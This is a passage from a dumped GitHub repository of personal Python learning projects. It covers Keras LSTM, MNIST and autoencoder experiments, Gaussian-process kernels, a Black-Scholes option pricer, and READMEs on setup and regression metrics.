= len(Y) - train_size\r\ntrainX, testX, testX1 = X[:train_size, :], X[train_size:len(Y), :], X[train_size:(len(Y)+1), :]\r\ntrainY, testY = Y[:train_size], Y[train_size:len(Y)]\r\n\r\n\r\n# create and fit the LSTM network\r\nmodel = Sequential()\r\n#model.add(Dense(2, input_dim=look_back))\r\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\r\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\r\ntestX1 = numpy.reshape(testX1, (testX1.shape[0], 1, testX1.shape[1]))\r\nmodel.add(LSTM(2, input_dim=look_back))\r\nmodel.add(Dense(1))\r\nmodel.compile(loss='mse', optimizer='adam')\r\nprint(model.summary())\r\nres = model.fit(trainX, trainY, nb_epoch=100, batch_size=10)\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\nplt.show()\r\n\r\n# make predictions\r\ntrainPredict = model.predict(trainX)\r\ntestPredict = model.predict(testX)\r\ntestPredict1 = model.predict(testX1)\r\n\r\n# calculate root mean squared error\r\ntrainScore = math.sqrt(mean_squared_error(trainY, trainPredict[:, 0]))\r\nprint('Train Score: %.2f RMSE' % (trainScore))\r\ntestScore = math.sqrt(mean_squared_error(testY, testPredict[:, 0]))\r\nprint('Test Score: %.2f RMSE' % (testScore))\r\n\r\n# shift train predictions for plotting\r\ntrainPredictPlot = numpy.empty_like(dataset)\r\ntrainPredictPlot[:, :] = numpy.nan\r\ntrainPredictPlot[(look_back-1):len(trainPredict)+(look_back-1), :] = trainPredict\r\n\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(dataset)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[(len(trainPredict)+(look_back-1)):, :] = testPredict1\r\n\r\n# plot baseline and predictions\r\ndataframe['train'] = pd.DataFrame(trainPredictPlot, index=dataframe.index)[0]\r\ndataframe['test'] = pd.DataFrame(testPredictPlot, index=dataframe.index)[0]\r\ndataframe.plot()\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(dataframe['train'] - dataframe['US GDP YoY'])\r\nplt.plot(dataframe['test'] - dataframe['US GDP YoY'])\r\n"
},
{
"alpha_fraction": 0.6216216087341309,
"alphanum_fraction": 0.6351351141929626,
"avg_line_length": 22.33333396911621,
"blob_id": "d465ebb6b2ef691727193e79977098d5553799c0",
"content_id": "ac1903e865da92afcc0a74b149c58d9f019a881b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 6,
"path": "/SGTrip/path.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\nyour_local_folder = 'D:/...'\r\nimport sys\r\nsys.path.insert(0, your_local_folder)\r\nimport os\r\nos.chdir(your_local_folder)\r\n\r\n"
},
{
"alpha_fraction": 0.6618942618370056,
"alphanum_fraction": 0.6844713687896729,
"avg_line_length": 24.28985595703125,
"blob_id": "37d2ba2e8caa1a900961b4d6d1bd91e13c603363",
"content_id": "fab0f3e077b4ad504621746af51295fd1ab15efc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1816,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 69,
"path": "/SGTrip/MNIST/MNIST_data.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# LOADING\r\nfilename=\"mnist.pkl.gz\"\r\n\r\nwith gzip.open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n training_data, validation_data, test_data = u.load()\r\n\r\nprint(training_data[0].__len__())\r\nprint(validation_data[0].__len__())\r\nprint(test_data[0].__len__())\r\n\r\n\r\n# VISUALIZE DATA\r\ni = 0\r\nexample = training_data[0][i]\r\nexample = np.reshape(example, (28, 28))\r\nplt.imshow(example, interpolation='nearest', cmap='Greys')\r\nplt.title(training_data[1][i])\r\nplt.show()\r\ni += 1\r\n\r\n\r\n# NEURAL NETWORK\r\n# Convert Y to dummy\r\nfrom keras.utils import np_utils\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Convolution2D\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ndata = training_data\r\nX = data[0]\r\nY = np_utils.to_categorical(data[1])\r\nXvalid = validation_data[0]\r\nYvalid = np_utils.to_categorical(validation_data[1])\r\ninput_dim = X[0].shape[0]\r\noutput_dim = 10\r\n\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\nmodel = Sequential()\r\nmodel.add(Dense(30, input_dim=input_dim, name='hidden_layer', activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='softmax'))\r\n\r\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\r\nprint(model.summary())\r\n# fit\r\nres = model.fit(X, Y, batch_size=10, nb_epoch=10, validation_data=(Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['acc'])\r\nplt.plot(res.epoch, res.history['val_acc'])\r\n\r\n# predict\r\ndata = test_data\r\nX = data[0]\r\nY = data[1]\r\nYhat = model.predict(X)\r\n\r\nprint(np.mean(np.argmax(Yhat, axis=1) == Y))\r\n\r\n"
},
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.6804511547088623,
"avg_line_length": 22.18181800842285,
"blob_id": "2390c51be2875bc350c162f2c3b6342f932d46de",
"content_id": "3d02fc79a2ac405e50c769debaf08bfa326d84ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/DeepLearningSC/sg_step1.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\" TEST Network for Demonstration \"\"\"\r\n\r\nimport mnist_loader\r\nimport network\r\n\r\ntraining_data, validation_data, test_data = \\\r\n mnist_loader.load_data_wrapper()\r\n\r\nnet = network.Network([784, 30, 10])\r\n\r\nnet.SGD(training_data, 30, 10, 3.0, test_data=test_data)\r\n"
},
{
"alpha_fraction": 0.6477832794189453,
"alphanum_fraction": 0.6588670015335083,
"avg_line_length": 24.19354820251465,
"blob_id": "31b5486d973edac2a39e057731d65a975ae88f50",
"content_id": "1df033913f4f4290c03dbbff3d0411a28e0e616c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1624,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 62,
"path": "/README.md",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "## pythonProjects ##\r\n----------\r\nPersonal python learning projects\r\n\r\n\r\n### Note: Performance metrics for regression model\r\n\r\nHere are three common evaluation metrics for regression problems:\r\n\r\n**Mean Absolute Error** (MAE) is the mean of the absolute value of the errors:\r\n\r\n$$\\frac 1n\\sum_{i=1}^n|y_i-\\hat{y}_i|$$\r\n\r\n**Mean Squared Error** (MSE) is the mean of the squared errors:\r\n\r\n$$\\frac 1n\\sum_{i=1}^n(y_i-\\hat{y}_i)^2$$\r\n\r\n**Root Mean Squared Error** (RMSE) is the square root of the mean of the squared errors:\r\n\r\n$$\\sqrt{\\frac 1n\\sum_{i=1}^n(y_i-\\hat{y}_i)^2}$$\r\n\r\n**Integral Example**\r\n$$\r\n\\Gamma(z) = \\int_0^\\infty t^{z-1}e^{-t}dt\\,.\r\n$$\r\n\r\n### UML diagrams\r\n\r\nYou can also render sequence diagrams like this:\r\n\r\n```sequence\r\nAlice->Bob: Hello Bob, how are you?\r\nNote right of Bob: Bob thinks\r\nBob-->Alice: I am good thanks!\r\n```\r\n\r\nAnd flow charts like this:\r\n\r\n```flow\r\nst=>start: Start\r\ne=>end\r\nop=>operation: My Operation\r\ncond=>condition: Yes or No?\r\n\r\nst->op->cond\r\ncond(yes)->e\r\ncond(no)->op\r\n```\r\n\r\n> **Note:** You can find more information:\r\n\r\n> - about **Sequence diagrams** syntax [here][7],\r\n> - about **Flow charts** syntax [here][8].\r\n\r\n### Support StackEdit\r\n\r\n[](https://monetizejs.com/authorize?client_id=ESTHdCYOi18iLhhO&summary=true)\r\n\r\n [^stackedit]: [StackEdit](https://stackedit.io/) is a full-featured, open-source Markdown editor based on PageDown, the Markdown library used by Stack Overflow and the other Stack Exchange sites.\r\n\r\n [7]: http://bramp.github.io/js-sequence-diagrams/\r\n [8]: http://adrai.github.io/flowchart.js/\r\n"
},
{
"alpha_fraction": 0.5991405844688416,
"alphanum_fraction": 0.6089625358581543,
"avg_line_length": 32.65957260131836,
"blob_id": "23286eb7df2264ca815e5f7810205ffc5885ba1c",
"content_id": "0339be3edb2ca1cc7e3a436173e522607fdaa9d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 47,
"path": "/SM/gp_utils.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors, ticker, cm\r\nfrom matplotlib.mlab import bivariate_normal\r\n#from numpy.linalg import inv\r\n\r\n# Function to get the GP solution\r\n\r\n\r\ndef gp_solve(x_train, y_train, x_pred, kernel, sig_noise=0, **kwargs):\r\n k_xx = kernel(x_train, x_train, **kwargs)\r\n k_x_xp = kernel(x_train, x_pred, **kwargs)\r\n k_xp_x = kernel(x_pred, x_train, **kwargs)\r\n k_xp_xp = kernel(x_pred, x_pred, **kwargs)\r\n\r\n Vinv = np.linalg.inv(k_xx + (sig_noise**2) * np.identity(len(k_xx)))\r\n mu = np.dot(np.dot(k_xp_x, Vinv), y_train)\r\n var = k_xp_xp - np.dot(np.dot(k_xp_x, Vinv), k_x_xp)\r\n\r\n return mu, var\r\n\r\n# function to plot the GP solution\r\n\r\n\r\ndef gp_plot(x, y, x_pred, mu_pred, cov_pred, n_sample=0, main=\"\"):\r\n\r\n se_pred = 2 * np.sqrt(np.diag(cov_pred))\r\n # plot samples from the posterior\r\n # (this can be misleading, we don't actually have the function, we have draws from an MvN using the learned mean and covariance of the function)\r\n for i in range(n_sample):\r\n samp_y = np.squeeze(\r\n np.random.multivariate_normal(mu_pred, cov_pred, 1))\r\n plt.plot(x_pred, samp_y, 'red', alpha=0.3)\r\n # plot the mean\r\n plt.plot(x_pred, mu_pred, 'red', alpha=0.7)\r\n # plot the observations\r\n plt.plot(x, y, 'o', markersize=3, color='blue', alpha=0.5)\r\n # plot prediction uncertainty\r\n plt.fill_between(x_pred, mu_pred - se_pred, mu_pred +\r\n se_pred, color='pink', alpha=0.7)\r\n plt.grid(alpha=0.2)\r\n plt.title(main)\r\n\r\n\r\nif __name__ == '__main__':\r\n gp_solve()\r\n gp_plot()\r\n"
},
{
"alpha_fraction": 0.4749999940395355,
"alphanum_fraction": 0.5415493249893188,
"avg_line_length": 27.58333396911621,
"blob_id": "47c13598b79717b1527821fb825e48dfc2da90d0",
"content_id": "1f2cbc90905b46fc20e1dae7f079ba5360ea5da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2840,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 96,
"path": "/SM/kernel_functions.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\n\r\n# linear kernel\r\ndef kfunc_linear(x1, x2, h=1, l=0):\r\n #print('kfunc_linear')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return (h * (X1-l) * (X2-l)).T\r\ndef kfunc_linear2(x1, x2, l=1):\r\n #print('kfunc_martern')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.abs(X1-X2).T\r\ndef kfunc_lin(x1, x2, b=0, v=1, c=0):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return (b**2 + v**2 * (X1-c) * (X2-c)).T\r\n\r\n# exponential kernel\r\ndef kfunc_exp(x1, x2, l=1):\r\n #print('kfunc_exp')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-1 * np.abs(X1-X2)).T\r\n\r\n# squared exponential kernel\r\ndef kfunc_exp_sq(x1, x2, l=1):\r\n #print('kfunc_exp_sq')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-0.5 * np.abs((X1-X2)/l)**2).T\r\n\r\n# browninan kernel\r\ndef kfunc_brown(x1, x2, l=1):\r\n #print('kfunc_brown')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.minimum(X1, X2).T\r\n\r\n# matern kernel\r\ndef kfunc_matern(x1, x2, l=1):\r\n #print('kfunc_martern')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return ((1 + np.abs(X1-X2)) * np.exp(-1 * np.abs(X1-X2))).T\r\n\r\n# gaussian kernel\r\ndef kfunc_gauss(x1, x2, l=1):\r\n #print('kfunc_gauss')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-0.5 * np.abs((X1-X2)/l)**2).T\r\n\r\n# sin kernel\r\ndef kfunc_sinc(x1, x2, l=1):\r\n #print('kfunc_sinc')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n Sigma = (np.sin(np.abs(X1-X2))/np.abs(X1-X2)).T\r\n np.fill_diagonal(Sigma, 1)\r\n return Sigma\r\n\r\n# squared exponential kernel\r\ndef kfunc_se(x1, x2, h=1, l=1):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * np.exp(-1 * ((X1-X2)/l)**2).T\r\n\r\n# rational quadratic kernel\r\ndef kfunc_rq(x1, x2, h=1, l=1, a=0.5):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * ((1 + ((X1-X2)**2)/(a*l**2))**(-a)).T\r\n\r\n# periodicic kernel\r\ndef kfunc_per(x1, x2, h=1, l=1, p=2):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * np.exp(-2/l**2 * np.sin(np.pi * np.abs((X1-X2)/p))**2).T\r\n #return h**2 * (np.exp(-2/l * np.sin(np.pi * np.abs((X1-X2)/p)))**2).T\r\n\r\n# locally periodicic kernel\r\ndef kfunc_local_per(x1, x2, h=1, l1=1, p=1, l2=1):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * (np.exp(-2/l1**2 * np.sin(np.pi * np.abs((X1-X2)/p))**2) * np.exp(-1 * ((X1-X2)/l2)**2)).T\r\n\r\ndef kfunc_per_add_lin(x1, x2, h, l, p, b, v, c):\r\n return kfunc_per(x1, x2, h, l, p) + kfunc_lin(x1, x2, b, v, c)\r\n\r\ndef kfunc_per_add_lin_gauss(x1, x2, h, l, p, b, v, c, gh, gl):\r\n return kfunc_per(x1, x2, h, l, p) + kfunc_lin(x1, x2, b, v, c) + kfunc_se(x1, x2, gh, gl)\r\n\r\nif __name__ == '__main__':\r\n kfunc_linear()\r\n kfunc_linear2()\r\n kfunc_lin()\r\n kfunc_exp()\r\n kfunc_exp_sq()\r\n kfunc_brown()\r\n kfunc_matern()\r\n kfunc_gauss()\r\n kfunc_sinc()\r\n kfunc_se()\r\n kfunc_rq()\r\n kfunc_per()\r\n kfunc_local_per()\r\n kfunc_per_add_lin()\r\n kfunc_per_add_lin_gauss()\r\n"
},
{
"alpha_fraction": 0.7051181197166443,
"alphanum_fraction": 0.7137795090675354,
"avg_line_length": 24.45833396911621,
"blob_id": "ac6abf6899844b0780d9c9423567482c939ee9a1",
"content_id": "48af5cc1fad70aaf2a7e61882ef0dc442b3d5443",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2540,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 96,
"path": "/SGTrip/Autoencoders/autoencoders.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "from keras.layers import Input, Dense\r\nfrom keras.models import Model\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nseed = 123\r\nnp.random.seed(seed)\r\n\r\ndata = pd.read_excel(\"data.xlsx\", index_col=0)\r\nprint(data.columns)\r\nplt.figure()\r\nplt.plot(data['S&P 500'])\r\nplt.show()\r\nret = data.pct_change()\r\nret = ret.ix[1:, :]\r\n\r\n#ret = expit(ret)\r\nret.to_excel(\"output/actual.xlsx\")\r\n\r\n# this is the size of our encoded representations\r\nencoding_dim = 2\r\n\r\nnr, nc = ret.shape\r\n\r\n# this is our input placeholder\r\ninput_data = Input(shape=(nc,))\r\n# \"encoded\" is the encoded representation of the input\r\nencoded = Dense(encoding_dim, activation='linear')(input_data)\r\n# \"decoded\" is the lossy reconstruction of the input\r\ndecoded = Dense(nc, activation='linear')(encoded)\r\n\r\n\r\n# this model maps an input to its reconstruction\r\nautoencoder = Model(input=input_data, output=decoded)\r\n\r\n# this model maps an input to its encoded representation\r\nencoder = Model(input=input_data, output=encoded)\r\n\r\n\r\n# create a placeholder for an encoded (m-dimensional) input\r\nencoded_input = Input(shape=(encoding_dim,))\r\n# retrieve the last layer of the autoencoder model\r\ndecoder_layer = autoencoder.layers[-1]\r\n# create the decoder model\r\ndecoder = Model(input=encoded_input, output=decoder_layer(encoded_input))\r\n\r\n\r\nautoencoder.compile(optimizer='rmsprop', loss='mse')\r\n\r\n\r\nx_train = np.array(ret)\r\nres = autoencoder.fit(x_train, x_train, nb_epoch=100, batch_size=50)\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\nplt.show()\r\n\r\nencoded_series = encoder.predict(x_train)\r\ndecoded_series = decoder.predict(encoded_series)\r\n\r\nencoded_series_pd = pd.DataFrame(encoded_series)\r\n#encoded_series_pd = logit(encoded_series_pd)\r\nencoded_series_pd.to_excel(\"output/res.xlsx\")\r\n\r\ndecoded_series_pd = pd.DataFrame(decoded_series, columns=ret.columns)\r\ndecoded_series_pd.to_excel(\"output/decoded.xlsx\")\r\n\r\n\r\n# Check results\r\nold_mean = decoded_series_pd.mean(axis=0)\r\nnew_mean = ret.mean(axis=0)\r\nnew_ret = decoded_series_pd.apply(lambda x: 1 + x - old_mean + new_mean, axis=1)\r\n\r\ndecoded_data = copy.deepcopy(data)\r\ndecoded_data.ix[1:] = new_ret.values\r\ndecoded_data = decoded_data.cumprod(axis=0)\r\n\r\ncol = data.columns[0]\r\nplt.figure()\r\nplt.plot(data[col])\r\nplt.plot(decoded_data[col])\r\nplt.show()\r\n\r\n# Initial correlation matrix\r\nplt.figure()\r\nplt.matshow(data.corr())\r\nx.set_xticklabels([''] + alpha)\r\n# Sparse correlation matrix\r\nplt.figure()\r\nplt.matshow(decoded_series_pd.corr())\r\nplt.show()\r\n\r\nprint(\"done\")\r\n"
},
{
"alpha_fraction": 0.684587836265564,
"alphanum_fraction": 0.7311828136444092,
"avg_line_length": 23.545454025268555,
"blob_id": "b9be80451fc9c7568781d0d8fa09fdf4f123578c",
"content_id": "9c5ffef2ab421c0faf5306b579ed068747ccc3d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 11,
"path": "/SGTrip/README.txt",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "To run all these codes, you will need \r\n-The Anaconda latest distribution working on Python 3.5\r\n-Keras\r\n-Tensorflow\r\n-Theano\r\n\r\nBefore running the code, change the value of \"your_local_folder\" in the path.py file.\r\n\r\nContact me if you need more info:\r\[email protected]\r\n+33 1 57 29 03 60"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 99,
"blob_id": "c9fa6b422695d874c223a9072bfd0fc73bfc1a25",
"content_id": "12d7c124c3817b13ac888f0aef6d79aebb602ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 1,
"path": "/SGTrip/MNIST/README.txt",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "The MNIST data file called \"mnist.pkl.gz\" can be downloaded at the url: https://github.com/mnielsen"
},
{
"alpha_fraction": 0.662813127040863,
"alphanum_fraction": 0.6888246536254883,
"avg_line_length": 28.52941131591797,
"blob_id": "601a3d1efbd7644a7d489b30e899f86a77dee1f3",
"content_id": "768c9a6030e6eb96110e648415aca9a9116f7258",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2076,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 68,
"path": "/SGTrip/MNIST/MNIST_data_CNN.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# LOADING\r\nfilename=\"mnist.pkl.gz\"\r\n\r\nwith gzip.open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n training_data, validation_data, test_data = u.load()\r\n\r\nprint(training_data[0].__len__())\r\nprint(validation_data[0].__len__())\r\nprint(test_data[0].__len__())\r\n\r\n\r\n# NEURAL NETWORK\r\n# Convert Y to dummy\r\nfrom keras.utils import np_utils\r\n# from keras.utils.visualize_util import plot as keras_plot\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Convolution2D, Flatten\r\nfrom keras.layers.pooling import MaxPooling2D\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ndata = test_data#training_data\r\nn = 28\r\nX = (data[0]).reshape(data[0].shape[0], 1, n, n)\r\nY = np_utils.to_categorical(data[1])\r\nXvalid = (validation_data[0]).reshape(validation_data[0].shape[0], 1, n, n)\r\nYvalid = np_utils.to_categorical(validation_data[1])\r\ninput_dim = X[0].shape\r\noutput_dim = 10\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(20, 5, 5, input_shape=(1, n, n), activation='relu', dim_ordering='th'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2), dim_ordering='th'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(100, name='hidden_layer', activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='softmax'))\r\n\r\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\nprint(model.summary())\r\n# keras_plot(model, to_file='model.png')\r\n# fit\r\nres = model.fit(X, Y, batch_size=10, nb_epoch=15, validation_data=(Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['acc'])\r\nplt.plot(res.epoch, res.history['val_acc'])\r\n\r\n# predict\r\ndata = training_data#test_data\r\nX = (data[0]).reshape(data[0].shape[0], 1, n, n)\r\nY = data[1]\r\nYhat = model.predict(X)\r\n\r\nprint(np.mean(np.argmax(Yhat, axis=1) == Y))\r\n"
},
{
"alpha_fraction": 0.5333611369132996,
"alphanum_fraction": 0.5460800528526306,
"avg_line_length": 30.18791961669922,
"blob_id": "8b7cc04b6b9162dc7d092c845f48ecf783c22bde",
"content_id": "b9e07b88639e1f540cf81a937f5622ef12b9d426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4796,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 149,
"path": "/SGTrip/BS/BSpricer.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport math as m\r\nfrom scipy.stats import norm\r\nfrom scipy.linalg import solve_banded\r\nfrom scipy.optimize import root\r\nimport numpy as np\r\nimport copy\r\n\r\n# Black and Scholes option model\r\nclass PayoffCall(object):\r\n def __init__(self, strike):\r\n self.strike = strike\r\n\r\n def __call__(self, x):\r\n return max(x - self.strike, 0)\r\n\r\n\r\nclass PayoffPut(PayoffCall):\r\n def __call__(self, x):\r\n return max(self.strike - x, 0)\r\n\r\n\r\nclass ModelBlackScholes(object):\r\n def __init__(self, s, expiry, payoff, r=0.0, sigma=0.0, y=0.0, sigma_surface=None, delta=None, moneyness=None):\r\n self.s = s\r\n self.expiry = expiry\r\n self.payoff = payoff\r\n self.r = r\r\n self.sigma = sigma\r\n self.y = y\r\n self.sigma_surface = sigma_surface\r\n self.sigma_update()\r\n self.strike_update(delta, moneyness)\r\n\r\n def sigma_update(self):\r\n if self.sigma_surface is not None:\r\n self.sigma = self.sigma_surface(self.expiry, self.payoff.strike / self.s)\r\n\r\n def strike_update(self, delta=None, moneyness=None):\r\n if delta is not None:\r\n self.set_strike(self.s)\r\n self.set_strike(self.strike_from_delta(delta))\r\n if moneyness is not None:\r\n self.set_strike(moneyness * self.s)\r\n\r\n def d1(self):\r\n try:\r\n if self.sigma == 0:\r\n raise ZeroDivisionError\r\n d = (m.log(self.s / self.payoff.strike) + (\r\n self.r - self.y + self.sigma ** 2 / 2) * self.expiry) / self.sigma / m.sqrt(\r\n self.expiry)\r\n except ZeroDivisionError:\r\n d = np.inf * (1.0 if self.s > self.payoff.strike else -1.0)\r\n return d\r\n\r\n def d2(self):\r\n return self.d1() - self.sigma * m.sqrt(self.expiry)\r\n\r\n def __call__(self):\r\n if type(self.payoff) in [PayoffCall]:\r\n price = self.s * m.exp(-self.y * self.expiry) * norm.cdf(self.d1()) - self.payoff.strike * m.exp(\r\n -self.r * self.expiry) * norm.cdf(\r\n self.d2())\r\n elif type(self.payoff) in [PayoffPut]:\r\n price = -self.s * m.exp(-self.y * self.expiry) * norm.cdf(-self.d1()) + self.payoff.strike * m.exp(\r\n -self.r * self.expiry) * norm.cdf(-self.d2())\r\n return price\r\n\r\n def delta(self):\r\n if type(self.payoff) in [PayoffCall]:\r\n delta = norm.cdf(self.d1())\r\n elif type(self.payoff) in [PayoffPut]:\r\n delta = norm.cdf(self.d1()) - 1\r\n return delta\r\n\r\n def gamma(self):\r\n return m.exp(-self.y * self.expiry) * norm.pdf(self.d1()) / self.s / self.sigma / m.sqrt(self.expiry)\r\n\r\n def gamma_strike(self):\r\n return -self.s / self.payoff.strike * self.gamma()\r\n\r\n def vega(self):\r\n return self.s * m.exp(-self.y * self.expiry) * norm.pdf(self.d1()) * m.sqrt(self.expiry)\r\n\r\n def strike_from_delta(self, delta_match, precision=10, n_iter_max=100):\r\n n_iter = 0\r\n option = copy.deepcopy(self)\r\n\r\n f = option.delta() - delta_match\r\n error = abs(f)\r\n\r\n while error > 10 ** (-precision) and n_iter < n_iter_max:\r\n f_prime = option.gamma_strike()\r\n # print f_prime\r\n # print -self.s / self.payoff.strike * self.gamma()\r\n option.set_strike(option.payoff.strike - f / f_prime)\r\n\r\n f = option.delta() - delta_match\r\n n_iter += 1\r\n error = abs(f)\r\n\r\n if n_iter == n_iter_max:\r\n print('Warning: raised n_iter_max in strike_from_delta method')\r\n\r\n output = option.payoff.strike\r\n del option\r\n return output\r\n\r\n def set_s(self, s):\r\n self.s = s\r\n self.sigma_update()\r\n\r\n def set_strike(self, strike):\r\n self.payoff.strike = strike\r\n self.sigma_update()\r\n\r\n def set_sigma(self, sigma):\r\n self.sigma = sigma\r\n\r\n def set_sigma_surface(self, sigma_surface):\r\n self.sigma_surface = sigma_surface\r\n self.sigma_update()\r\n\r\n\r\ndef implied_sigma(S, expiry, payoff, strike, r, price, eps=0.0001, sigma_min = 0.0, sigma_max = 1.0, max_iter=100):\r\n sigma = (sigma_min + sigma_max) / 2.0\r\n model = ModelBlackScholes(S, expiry, payoff(strike), r=r, sigma=sigma)\r\n model_price = model()\r\n error = 10000.0\r\n iter = 0\r\n\r\n while(error >= eps and iter <= max_iter):\r\n if model_price >= price:\r\n sigma_max = sigma\r\n else:\r\n sigma_min = sigma\r\n sigma = (sigma_min + sigma_max) / 2.0\r\n\r\n model.set_sigma(sigma)\r\n model_price = model()\r\n error = abs(model_price - price)\r\n iter += 1\r\n\r\n if iter > max_iter and error >= eps:\r\n return np.nan\r\n else:\r\n return sigma\r\n"
},
{
"alpha_fraction": 0.6167641282081604,
"alphanum_fraction": 0.6588693857192993,
"avg_line_length": 29.280487060546875,
"blob_id": "da9b6a2b5b6fc6ca112cd550ec4b570b74a668cf",
"content_id": "c56177597d44f3b9ac31ebb8ded573abf7ce5bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2565,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 82,
"path": "/SGTrip/BS/Option_BS2_stat.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
